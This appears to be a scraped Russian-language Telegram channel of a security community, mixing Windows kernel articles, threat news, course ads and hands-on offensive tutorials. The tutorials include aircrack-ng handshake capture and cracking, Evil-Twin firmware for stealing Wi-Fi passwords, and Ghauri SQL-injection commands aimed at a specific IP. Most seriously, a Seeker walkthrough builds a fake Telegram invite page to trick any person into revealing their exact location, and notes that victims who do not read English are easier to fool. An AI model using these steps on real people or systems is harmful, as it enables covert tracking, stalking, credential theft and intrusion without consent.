Codeby
35.9K subscribers
1.5K photos
92 videos
12 files
7.42K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🔔 Вторая часть серии статей о ядре Windows посвящена исследованию подсистемы Win32 и драйвера поддержки win32k.sys, рассматриваются переходы из пользовательского режима в режим ядра через таблицу системных сервисов SSDT.

🗣️ Статья включает практические примеры в отладчике WinDbg, так что знания можно сразу применить на практике. Рекомендуется к прочтению после первой части.


Подсистема Win32 в архитектуре Windows
🔸В Windows виртуальная память делится на область пользователя (User) и ядра (Kernel). На системах x64 используется только часть адресного пространства. Старшие 16 бит установлены в единицу, что позволяет по старшим битам адреса сразу определять, принадлежит ли объект ядру или пользователю.
🔸Win32, основная подсистема Windows, предоставляет базовые библиотеки окружения, такие как Kernel32, User32 и Gdi32, отвечающие за интерфейсы графики (GUI). Отдельное внимание уделено драйверу win32k.sys, который поддерживает работу графического интерфейса в ядре.

Файлы Csrss.exe, Gdi32.dll и Win32k.sys
🔸GDI (Graphics Device Interface) — это компонент для вывода графического контента на устройства. До NT4 он находился в пользовательском режиме, но в целях безопасности его перенесли в режим ядра, добавив win32k.sys. Теперь CSRSS (Client/Server Runtime SubSystem) обрабатывает только консольные задачи, а графика передана win32k.sys.

SSDT — System Service Descriptor Table
🔸SSDT позволяет выполнять системные вызовы в ядре с использованием SYSENTER/SYSCALL инструкций. Для каждой функции ядра есть уникальный "System Service Number" (SSN), который задает ее адрес в SSDT. Это обеспечивает быстрый и эффективный переход между режимами.
🔸Для графических функций существует отдельная "затененная" таблица — SSDT Shadow. Она действует только для GUI-приложений, тогда как консольные приложения используют основную таблицу SSDT#0.

⚙️ В статье приводится демонстрация работы SSDT и SSDT Shadow в отладчике WinDbg. Указатели на обе таблицы можно обнаружить, подключившись к процессу GUI.

➡️ Читать подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥129
Согласно новому отчёту Email Threat Trends Report от Vipre Security Group, мошеннические атаки с использованием деловой переписки (BEC) составляют более половины всех фишинговых попыток, и производственные компании оказались особенно уязвимыми.

Основные данные отчёта
🔸 Из 1,8 миллиарда обработанных за квартал писем, 12% были классифицированы как вредоносные, а на BEC пришлось 58% всех фишинговых атак.
🔸 В 89% случаев атакующие выдавали себя за авторитетных лиц, чтобы вызвать доверие.
🔸 Производственный сектор оказался наиболее подверженным угрозам: 27% всех обработанных писем в этой отрасли оказались вредоносными.

⚙️ Рост атак на производственный сектор
На производственные компании стали чаще нацеливаться из-за возможности перенаправления платежей поставщиков на мошеннические счета. Кроме того, взлом корпоративных почтовых ящиков даёт доступ к другим компаниям и клиентам, позволяя отправлять поддельные запросы на документы для кражи учетных данных.

Почему риск возрастает?
Многие сотрудники в секторе производства используют мобильные устройства для входа на рабочие площадки, что повышает вероятность попадания на фишинговые ссылки в условиях высокой занятости и стремления к соблюдению сроков.

🛡 ИИ в службе BEC-мошенничества
Отчёт отмечает, что 36% фишинговых писем с использованием BEC были созданы генеративным ИИ, что делает их более сложными для выявления. Злоумышленники также часто используют вложения и URL-перенаправления для обхода систем безопасности.

#новости #фишинг
Please open Telegram to view this post
VIEW IN TELEGRAM
👍177🔥7
В третьей статье цикла обсудим архитектуру объектов USER и GDI, которые отвечают за графику и интерфейс Windows. Например, объект типа *Window* включает почти все элементы окна — кнопки, поля ввода, списки и чекбоксы, а GDI добавляет обрамление, фигуры, цвет и шрифты.

⚙️Память и пулы Windows

Вся физическая память распределяется через системный диспетчер. Он выделяет большие объёмы через VirtualAlloc() и мелкие через HeapAlloc(), которые на уровне ядра обращаются к NtAllocateVirtualMemory() и RtlAllocateHeap().

Память делится на Paged Pool (может выгружаться на диск) и NonPaged Pool (всегда в ОЗУ). При старте создаётся несколько базовых пула для каждого пользователя в своей сессии, а также для всех системных служб. Это помогает системно управлять памятью и разграничивать процессы.

⚙️USER и GDI: Память и объектная таблица

🔸 USER-объекты (интерфейсные элементы) хранятся в куче рабочего стола.
🔸 GDI-объекты (графические примитивы) получают память из NonPagedSessionPool.

Объекты GDI привязаны к контексту создающего их процесса. Например, передача кисти из одного процесса в другой с высокой вероятностью может привести к сбоям.

Дескрипторы объектов управляются глобальной таблицей в каждой сессии и индексируются в фиксированной таблице с лимитом в 65,536 объектов. Например, GDIProcessHandleQuota в реестре ограничивает доступный для процесса лимит (по умолчанию — 10,000 дескрипторов).

⚙️Объекты USER

USER-объекты индексируются в таблице дескрипторов каждой сессии, которая отображается в пользовательском пространстве каждого GUI-процесса. Указатель на таблицу USER хранится в win32k!gSharedInfo, и её записи отображаются через массив HANDLEENTRY, предоставляя быстрый доступ процессам без необходимости в вызовах ядра.

🗣️ GDI и USER объекты — основа графической подсистемы Windows, которая позволяет управлять интерфейсом и графикой на уровне ядра.


➡️ Читать подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍87
✔️ Вышла новая статья рубрики "Без про-v-ода"!

Сегодня мы тестируем три популярных прошивки для платы ESP8266: ESP8266-EvilTwin, ESP8266-Captive-Portal и PhiSiFi. Если вы уже пробовали deauther, пришло время познакомиться с другими прошивками, каждая из которых предлагает уникальные возможности.

⚙️ PhiSiFi объединяет функционал Evil-Twin и Captive-Portal, создавая поддельные точки доступа для захвата паролей и отключения пользователей от сети. Простой интерфейс и удобный Captive Portal делают её идеальной для тестирования беспроводной безопасности.

📎 EvilTwin и Captive-Portal тоже отлично работают, но уступают по функционалу и удобству. EvilTwin предлагает самописный интерфейс для создания фейковых точек доступа, а Captive-Portal больше подходит для развлечения и демонстрации захвата данных.

✔️ Читать подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥7💯52
😎 Кодебай на Kuban CSC 2024. Как это было?

На прошлой неделе завершилась международная конференция по кибербезопасности Kuban CSC 2024, и мы рады поделиться с вами, как она прошла!
В этом году Кодебай выступал генеральным партнером мероприятия, поддерживая всё – от организации CTF-соревнований до открытия нашего фирменного стенда, где собрались сотни участников.

ℹ️ CTF-соревнования от Кодебай
Наши специалисты подготовили уникальную площадку для соревнований по практической информационной безопасности – KubanCTF-2024, в которой приняли участие команды студентов и школьников со всей России. На этой площадке в августе прошел отборочный этап, а в этом октябре более 20 команд сражались за призовые места!

🗣️ "Это была отличная возможность для молодых специалистов испытать свои силы и получить ценный опыт в решении реальных задач кибербезопасности." — Магомед-Эми, создатель CTF-заданий для KubanCTF 2024
🎉 Розыгрыш призов на стенде Кодебай
Наш стенд стал одним из самых популярных мест на конференции! Каждый мог поучаствовать в розыгрыше призов — от фирменного мерча до скидок на курсы Академии и годовой подписки на codeby.games. А случайно выбранный счастливчик выиграл главный приз — наушники AirPods Max. Поздравляем победителя и благодарим всех, кто присоединился к нашему розыгрышу!

🗣️ "Мы — те самые ребята, которые взламывают ваши компании и дают рекомендации как закрыть уязвимости." — Сергей Попов, генеральный директор и основатель "Кодебай"


💯 Кодебай — лидер в области образования в кибербезопасности
Мы гордимся тем, что можем делиться опытом и знаниями с молодыми специалистами и профессионалами отрасли. Наше сообщество охватывает все направления информационной безопасности, помогая каждому открыть для себя мир кибербезопасности. KubanCSC – это большой шаг вперед в развитии отечественных специалистов, и мы благодарны всем, кто стал частью этого важного события.

Спасибо, что были с нами на этом значимом мероприятии! До новых встреч!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍26🔥12🏆104🎉4👎2
29 октября Apple выпустила критическое обновление безопасности для 90 своих сервисов и операционных систем, включая macOS, iOS, iPadOS, watchOS, tvOS и visionOS. Обновления также коснулись Safari и iTunes. Это обновление устраняет множество уязвимостей, которые могли поставить под угрозу конфиденциальность и безопасность пользователей.

Что нового?
🔸 macOS: Исправлены уязвимости, которые позволяли злоумышленникам получить доступ к контактам, конфиденциальным данным геолокации через сервис Find My и утечкам критических данных ядра. Некоторые из них также устраняли возможность атаки отказа в обслуживании (DoS) при открытии вредоносных изображений.
🔸 Safari: Закрыты дыры, позволявшие утечку истории просмотров в режиме Private Browsing.
🔸 iOS и iPadOS: Устранены баги, которые позволяли просматривать личные данные, даже если устройство заблокировано. Среди уязвимостей — проблема с Siri, из-за которой можно было просматривать фотографии контактов.
🔸 visionOS 2.1: Обновление включает исправления более чем 25 уязвимостей, некоторые из которых позволяли выполнение произвольного кода, доступ к конфиденциальной информации и даже полный сбой системы.

🗣️ Apple подчеркивает, что своевременное обновление ПО — это ключ к защите устройств и данных. Исследователи из таких компаний, как Trend Micro, CrowdStrike, Alibaba и JD.com, внесли значительный вклад в обнаружение и устранение этих уязвимостей.


#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍116🔥5
Aircrack-ng👩‍💻

Aircrack-ng - это инструмент, который используется для безопасности и взлома Wi-Fi сетей. Это всё в одном - сниффер пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и инструмент захвата хэшей. Он помогает захватывать пакеты и считывать из них хэши и даже взламывать эти хэши с помощью различных атак, таких как атаки по словарю.
Может работать в 4 режимах:
Режим монитора - Мониторит передачу пакетов и захватывает их, пока не поймает определённый файл с хэшем.
Режим атаки - Создаёт поддельные точки доступа и выполняет деаунтификацию.
Режим тестировки - Проверка вашей сетевой карты на совместимость и исправность, относительно работы программы.
Режим взлома - взламывет WEP или WPA PSK.

🔸Для вывода листа доступных сетевых интерфейсов, можно просто написать:
airmon-ng


🔸Можно остановить сетевой интерфейс:
airmon-ng stop <INTERFACE>


🔸И запустить на определённом канале:
airmon-ng start <INTERFACE> <CHANNEL>


🔸Давайте попробуем украсть аутентификационное рукопожатие)):
airodump-ng -c <CHANNEL> --bssid <BSSID> -w psk <INTERFACE>


🔸А далее можно подобрать пароль с помощью aircrack-ng:
aircrack-ng -w <PATH_T0_WORDLIST> <HANDSHAKE>
Please open Telegram to view this post
VIEW IN TELEGRAM
24👍13🔥6😁3💯1
Исследовательская группа Sysdig Threat Research Team (TRT) сообщает о глобальной атаке под кодовым названием Emeraldwhale, нацеленной на уязвимые Git-конфигурации. В результате этой операции злоумышленники похитили более 15,000 учетных данных для облачных сервисов, а также смогли клонировать более 10,000 приватных репозиториев.

Масштаб утечки
Украденные данные включают широкий спектр сервисов, от облачных провайдеров до почтовых платформ. Похищенные учетные данные активно используются в фишинговых и спам-кампаниях, а также продаются на подпольных рынках, где стоимость аккаунта может достигать сотен долларов.

⚙️ Инструменты и тактика атакующих
В ходе расследования Sysdig обнаружил, что злоумышленники использовали автоматизированные инструменты для поиска открытых Git-конфигураций и файлов .env, содержащих учетные данные. С помощью таких инструментов, как httpx и специализированных сканеров, Emeraldwhale смогли получать доступ к закрытым репозиториям и извлекать ключи для дальнейших атак.

🗣️ Атака Emeraldwhale показала, что одних мер по защите секретов недостаточно — критически важно отслеживать действия всех учетных записей с доступом к конфиденциальной информации. В противном случае утечка данных может стать точкой входа для широкомасштабных атак.


🛡 Как защититься?
🔸 Периодически проверяйте конфигурации веб-сервисов на предмет ошибок.
🔸 Используйте системы мониторинга активности учетных записей.
🔸 Обучите сотрудников основам безопасности для предотвращения ошибок, приводящих к утечкам данных.

#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥75
🚩 Новые задания на платформе Codeby Games!

🖼 Категория СтеганографияТайна пикселей

🏆  Категория КвестыСимпсоны

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍74🥰1🎉1
Seeker

Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.

Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".

🔸 Установка утилиты
git clone https://github.com/thewhiteh4t/seeker

🔸 Запуск
cd seeker/
python3 seeker.py


Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
ngrok строго относится к тому, что на нём запускают.


🔸 Установка ngrok
Скачиваем архив и командой разорхивируем его: sudo tar -xvzf ~/Downloads/ngrok.tgz -C /usr/local/bin

🔸 Далее создаём аккаунт и регистрируем автотокен, его можно найти у себя на аккаунте
ngrok config add-authtoken <token>

Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
ngrok http 8080
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍189🔥5😁3😱1
Исследователи кибербезопасности обнаружили новую волну атак, в которых злоумышленники эксплуатируют API DocuSign для отправки поддельных счетов. В отличие от традиционного фишинга, здесь преступники создают подлинные аккаунты и используют шаблоны DocuSign, чтобы выдавать себя за известные бренды и обходить защитные фильтры 💱

👀 Новый уровень фишинга
Вместо поддельных писем с вредоносными ссылками, эти атаки используют реальные сервисы для создания доверия.
🗣️ К примеру, как сообщает Wallarm, киберпреступники открывают платные аккаунты DocuSign и настраивают шаблоны для имитации счетов от компаний, таких как Norton Antivirus.


Злоумышленники отправляют такие счета напрямую через DocuSign, и они проходят проверку как подлинные, так как исходят с легитимного сервиса, не содержащего явных вредоносных ссылок.

✏️ Чтобы снизить риски, специалисты Wallarm рекомендуют:
🔸 Проверять отправителя и внимательно смотреть на подозрительные письма.
🔸 Вводить многоступенчатое подтверждение финансовых операций.
🔸 Обучать сотрудников распознавать поддельные счета.
🔸 Мониторить любые неожиданные транзакции.

Сторонние сервисы также должны применять ограничение на количество запросов к API и отслеживать аномалии в активности API.

🟢 API уязвимости
За последние месяцы пользователи DocuSign массово жалуются на мошеннические счета, указывая на высокую автоматизацию таких атак. Злоумышленники используют API DocuSign, чтобы отправлять поддельные счета в большом объеме. Wallarm предупреждает: удобство API дизайна — это и потенциальная лазейка для злоумышленников.

#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥65
Растет тенденция использования кибергруппировками в атаках сертификатов с расширенной проверкой (EV). Основные злоупотребления включают использование кодовых подписей для обхода мер безопасности, получения привилегий и создания доверия у пользователей. Злоумышленники могут приобретать EV-сертификаты на теневых рынках за $2000-6000. Получение сертификатов возможно через создание фиктивных компаний или кражу подписей у реальных организаций, как это произошло с NVIDIA, которые затем использовались в реальных атаках. Это позволяет им подписывать вредоносное ПО и распространять его под видом легитимного.

Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности

Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов

Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.
🔥129👍8
😎 Напоминаем, на каких курсах начинается обучение в ноябре:

🌟 6 ноября: Курс «Введение в Реверс инжиниринг» (Запись до 16 ноября)
🌟 7 ноября: Курс «Боевой OSINT»
🌟 11 ноября: Курс «Основы Linux»
🌟 25 ноября: Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)»

✔️ Запись на курс «Специалист центра мониторинга инцидентов информационной безопасности (SOC)» продлится до 7 ноября!

Внимание! До конца ноября у вас есть возможность купить курсы декабря по старым ценам*:
🔸2 декабря: Курс «Тестирование Веб-Приложений на проникновение (WAPT)»
🔸16 декабря: Курс «Анализ защищенности инфраструктуры на основе технологий Active Directory»

*С декабря стоимость курсов увеличится на 15%

🔔 Запишитесь у нашего менеджера @Codeby_Academy 🚀 или узнайте подробности на сайте!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍97👎2
🚨 Социальная инженерия и OSINT в VK: раскрытие методов и инструментов

В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.

✉️ Пассивный сбор данных: Узнаем, как найти профиль по никнейму, применяя Google Dork, Web Archive и полезные боты для анализа закрытых страниц. Покажем инструменты для поиска по фото, такие как FindClone и search4faces, чтобы отыскать людей даже с минимальными данными.

✏️ Активный сбор данных с помощью социальной инженерии: Расскажем, как можно использовать хитрые ссылки и инструменты, такие как StormBreaker, чтобы получить дополнительную информацию о цели.

➡️ Читать подробнее
➡️ Стать экспертом по OSINT
на обновленном курсе Академии
здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥76🎉1
Расширение Hide YouTube Shorts для Chrome после смены владельца стало вредоносным. Вредоносный код был добавлен сразу после смены владельца. В результате чего, плагин начал заниматься мошенничеством с партнёрскими программами и отправлять псевдонимизированные данные пользователей на облачный сервер Amazon. Партнерское мошенничество направлено на генерацию прибыли, используя домен kra18[.]com, который заменяет ссылки на реферальные.

Список некоторых из затронутых популярных расширений:
⏺️Hide YouTube Shorts
⏺️Dynamics 365 Power Pane
⏺️Karma | Online shopping, but better
⏺️Visual Effects for Google Meet
⏺️M3U8 Downloader

Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.

👀 Вредоносный код в расширениях не был обфусцирован или замаскирован. Каждая часть кода по отдельности выглядит довольно безобидно, но в совокупности внедрённые функции приводят к нелегитимным воздействиям.

Зачем Karma Shopping нужны данные о пользователях?
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.

⚙️ Несмотря на жалобы пользователей Google не реагирует.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.

#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍198🔥8😱2
🔄 💻 Ghauri v1.3.8

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries


Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle


Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML


Добавлена поддержка:

--sql-shell
--proxy

⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt

python3 setup.py install

ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥943